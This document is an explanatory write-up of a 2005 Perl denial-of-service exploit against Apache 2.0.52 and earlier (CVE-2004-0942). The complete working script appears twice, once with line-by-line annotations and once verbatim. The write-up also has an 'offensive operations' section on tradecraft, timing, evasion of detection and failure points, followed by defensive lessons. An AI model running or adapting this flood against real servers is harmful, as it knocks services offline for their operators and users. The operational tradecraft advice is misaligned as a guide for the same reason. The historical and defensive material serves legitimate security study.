Apache 2.0.52 GET Denial of Service Exploit Explained

What this paper is

This paper is an exploit script written in Perl that targets a vulnerability in Apache web servers, specifically versions up to and including 2.0.52. The vulnerability allows an attacker to cause a Denial of Service (DoS) by sending a specially crafted HTTP GET request. The script aims to exhaust the server's resources, making it unresponsive to legitimate user requests.

Simple technical breakdown

The exploit works by sending a standard HTTP GET request to the Apache server, but then it repeatedly sends a very long string of spaces followed by a newline character. This excessive and malformed data overwhelms the server's ability to process requests, leading to a DoS condition. The script allows the user to specify how many times this malformed data should be sent.

Complete code and payload walkthrough

The provided Perl script is designed to exploit a DoS vulnerability in Apache versions up to 2.0.52. Let's break down the code and its functionality.

#!/usr/bin/perl

# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things.
#
# Shit ->
#             My English now is bulls shit :( I try study it :)
#

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket; # Imports the module for network socket operations.

if (@ARGV <1) # Checks if fewer than one command-line argument is provided.
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n"; # Prints usage instructions.
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit(); # Exits the script if arguments are insufficient.
  }

print "\n <+> Prepare to start connect.\n"; # Informative message.

$s = IO::Socket::INET->new(Proto=>"tcp", # Creates a new TCP socket.
                            PeerAddr=>$ARGV[0], # Sets the target IP address from the first argument.
                            PeerPort=>80, # Sets the target port to 80 (HTTP).
                            Timeout=>6 # Sets a timeout for the connection attempt.
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n"; # Error handling if connection fails.
  $s->autoflush(); # Ensures data is sent immediately without buffering.

print " <+> Connected to $ARGV[0]\n"; # Confirms successful connection.
print " <+> Send of first part of devil header.\n"; # Informative message.

  print $s "GET / HTTP/1.0\n"; # Sends a basic HTTP GET request. This is the initial "normal" request.

$trys = 8000; # Default value for the number of times the malicious payload will be sent.

if ($ARGV[1]) # Checks if a second command-line argument (number of tries) is provided.
{
  $trys = $ARGV[1]; # If provided, sets $trys to the value of the second argument.
}

print " <+> Prepare to DoS with $trys trys.\n"; # Informs about the number of iterations.
print " <+> Start DoS send second part of devil header.\n"; # Informative message.
print " <SOD> |"; # Marks the start of the progress indicator.

$i=0; # Initializes a counter for the loop.

 do { # Starts a do-while loop.

     print $s (" " x 8000 . "\n"); # Sends a string of 8000 spaces followed by a newline character to the server. This is the core of the DoS payload.

      if ($i % 500 == 0) # Checks if the current iteration is a multiple of 500.
        {
         print "="; # Prints an equals sign to show progress.
        }

     ++$i; # Increments the counter.

    } until ($i == $trys); # The loop continues until the counter reaches the specified number of tries.


print "> <EOD>\n"; # Marks the end of the progress indicator.

close($s); # Closes the socket connection.

print " <+> Ok now target web server maybe DoSeD.\n"; # Final message indicating potential DoS.

# milw0rm.com [2005-03-04]

Code Fragment/Block -> Practical Purpose Mapping:

• #!/usr/bin/perl: Shebang line, indicates the script should be executed with the Perl interpreter.
• Comments (# ...): Provide context, credit, information about the vulnerability (CVE-2004-0942), usage examples, and warnings.
• use IO::Socket;: Imports the necessary Perl module for creating and managing network sockets.
• if (@ARGV <1) block: Handles command-line arguments. If no IP address is provided, it prints usage instructions and exits.
• print "\n <+> Prepare to start connect.\n";: User-facing output indicating the script's intent.
• $s = IO::Socket::INET->new(...): Establishes a TCP connection to the target IP address on port 80.
  • Proto=>"tcp": Specifies the TCP protocol.
  • PeerAddr=>$ARGV[0]: Sets the destination IP address from the first command-line argument.
  • PeerPort=>80: Sets the destination port to the standard HTTP port.
  • Timeout=>6: Sets a 6-second timeout for the connection attempt.
• or die " <-> Target web server already DoSeD ??? or can't connect :(\n";: Error handling if the socket creation fails.
• $s->autoflush();: Ensures that data sent through the socket is immediately transmitted, not buffered.
• print " <+> Connected to $ARGV[0]\n";: Confirms a successful connection to the target.
• print $s "GET / HTTP/1.0\n";: Sends a basic HTTP GET request. This is the initial, seemingly legitimate request.
• $trys = 8000;: Initializes a variable $trys with a default value of 8000. This variable determines how many times the malicious payload will be sent.
• if ($ARGV[1]) { $trys = $ARGV[1]; }: Checks if a second command-line argument is provided. If so, it overrides the default $trys value with the user-provided number.
• do { ... } until ($i == $trys);: This is the core loop of the exploit.
  • print $s (" " x 8000 . "\n");: This is the malicious payload. It sends a string consisting of 8000 space characters followed by a newline character over the established socket. This is repeated $trys times.
  • if ($i % 500 == 0) { print "="; }: This part provides a visual progress indicator by printing an equals sign every 500 iterations.
  • ++$i;: Increments the loop counter.
• print "> <EOD>\n";: Marks the end of the progress indicator.
• close($s);: Closes the network connection to the target.
• print " <+> Ok now target web server maybe DoSeD.\n";: Final output indicating the exploit has completed and the target might be in a DoS state.

Shellcode/Payload Segments:

There is no traditional shellcode in this exploit. The "payload" is the sequence of network packets sent to the server.

• Stage 1: Initial Connection and HTTP GET Request:
  • Purpose: To establish a connection to the target Apache server and send a standard HTTP GET request. This is often done to ensure the server is alive and listening, and to initiate a request that the server will try to process.
  • Mechanism: IO::Socket::INET->new(...) and print $s "GET / HTTP/1.0\n";.
• Stage 2: Repeated Malicious Data Injection:
  • Purpose: To overwhelm the server's resources by sending a large volume of malformed data. The vulnerability likely lies in how Apache handles excessively long header lines or malformed requests, leading to resource exhaustion (e.g., memory leaks, excessive CPU usage, thread/process blocking).
  • Mechanism: The do { ... } until ($i == $trys); loop, specifically the print $s (" " x 8000 . "\n"); line. This sends 8000 spaces followed by a newline, repeated $trys times.

Practical details for offensive operations teams

• Required Access Level: Network access to the target IP address and port 80 (HTTP). No local system access is required on the target.
• Lab Preconditions:
  • A controlled lab environment with a vulnerable Apache version (2.0.52 or earlier) running on a test system.
  • Network connectivity between the attacker machine and the target.
  • A Perl interpreter installed on the attacker machine.
• Tooling Assumptions:
  • Perl interpreter.
  • Basic network connectivity tools (e.g., ping to check reachability).
• Execution Pitfalls:
  • Firewalls: Network firewalls might block outbound connections to port 80 or inbound responses if the server attempts to reply.
  • Intrusion Detection/Prevention Systems (IDS/IPS): Signature-based IDS/IPS might detect the unusual pattern of repeated large space strings as malicious.
  • Server Configuration: Modern Apache configurations or server hardening might mitigate this specific vulnerability. The exploit relies on older, less robust handling of malformed HTTP requests.
  • Resource Exhaustion: The exploit might not cause a complete DoS if the server has ample resources or if the number of trys is too low. Conversely, excessively high trys could consume significant bandwidth and processing power on the attacker's machine.
  • Target Unresponsiveness: If the target is already down or unreachable, the script will report a connection error.
  • Windows Specifics: The author notes experimentation is needed for Windows. The default trys value (8000) might be insufficient, and increasing it (e.g., to 30000 as in the example) might be necessary. This suggests Windows Apache instances might have different resource management or buffering characteristics.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the Apache version and OS of the target during reconnaissance. Tools like whatweb or manual HTTP header analysis can help.
  • Stealth: This exploit is noisy. The large volume of traffic and the nature of the payload are easily detectable. It's unlikely to be used in a stealthy operation.
  • Impact Assessment: Understand that this is a DoS attack. Its primary goal is to disrupt service, not gain access.
  • Timing: Execute during periods of low legitimate traffic if possible, though the goal is to disrupt service regardless.
  • Payload Customization: The trys parameter is the primary customization. Experimentation is key, especially for different operating systems or server configurations.
• Likely Failure Points:
  • Server not running Apache or a vulnerable version.
  • Network connectivity issues.
  • Firewall blocking traffic.
  • IDS/IPS detection and blocking.
  • Server's ability to handle the malformed requests without crashing or becoming unresponsive (e.g., due to robust error handling or resource limits).
  • Incorrect target IP or port.

Where this was used and when

• Discovery/Publication: The exploit was published on March 4, 2005, by GreenwooD.
• Vulnerability Context: It targets a vulnerability (CVE-2004-0942) that was known and discussed in late 2004. The original credit for the exploit concept is given to Chintan Trivedi on the FullDisclosure mailing list in November 2004.
• Usage Context: This type of exploit would have been used in the mid-2000s by individuals or groups looking to disrupt web services. It's a classic example of a resource exhaustion DoS attack against a widely used web server. It's unlikely to be effective against modern, patched Apache installations.

Defensive lessons for modern teams

• Patch Management: Keep web server software (Apache, Nginx, etc.) and operating systems up-to-date with the latest security patches. This vulnerability is addressed in later Apache versions.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block malformed HTTP requests, excessively long headers, or unusual traffic patterns.
• Network Intrusion Detection/Prevention Systems (IDS/IPS): Ensure IDS/IPS signatures are updated to detect known DoS attack patterns, including those involving malformed HTTP requests.
• Server Resource Monitoring: Implement robust monitoring for CPU, memory, and network usage on web servers. Sudden spikes can indicate an ongoing attack.
• Rate Limiting: Configure web servers or network devices to limit the rate of incoming requests from individual IP addresses or to specific resources.
• HTTP Request Validation: Implement strict validation of incoming HTTP requests at the server level, rejecting requests that do not conform to RFC standards or that contain excessively large or malformed fields.
• Logging and Alerting: Ensure comprehensive logging of web server activity and set up alerts for suspicious events, such as a high volume of errors (like HTTP 500 errors mentioned in the exploit notes) or connection attempts.

ASCII visual (if applicable)

This exploit's flow is primarily linear network communication. An ASCII visual can illustrate the connection and data flow.

+-----------------+      +-----------------+      +-----------------+
| Attacker Machine|----->| Network/Firewall|----->| Target Apache   |
| (Perl Script)   |      |                 |      | Server (2.0.52-) |
+-----------------+      +-----------------+      +-----------------+
        |
        | 1. Establish TCP Connection (Port 80)
        | 2. Send "GET / HTTP/1.0\n"
        | 3. Repeatedly send " " * 8000 + "\n"
        |    (N times, where N = trys)
        | 4. Close Connection
        |
        V
    (Server attempts to process,
     leading to resource exhaustion)

Source references

• Paper URL: https://www.exploit-db.com/papers/855
• Original Exploit-DB Raw URL: https://www.exploit-db.com/raw/855
• Related CVE: CAN-2004-0942
• Original Discussion (FullDisclosure): http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl

# Based on -> 
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#             
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to 
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->    
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings -> 
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things.  
#
# Shit -> 
#             My English now is bulls shit :( I try study it :)
#            

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";    
  
  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";    
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n"); 

   
      if ($i % 500 == 0)
        { 
         print "=";
        }  

     ++$i;

    } until ($i == $trys); 


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n"; 

# milw0rm.com [2005-03-04]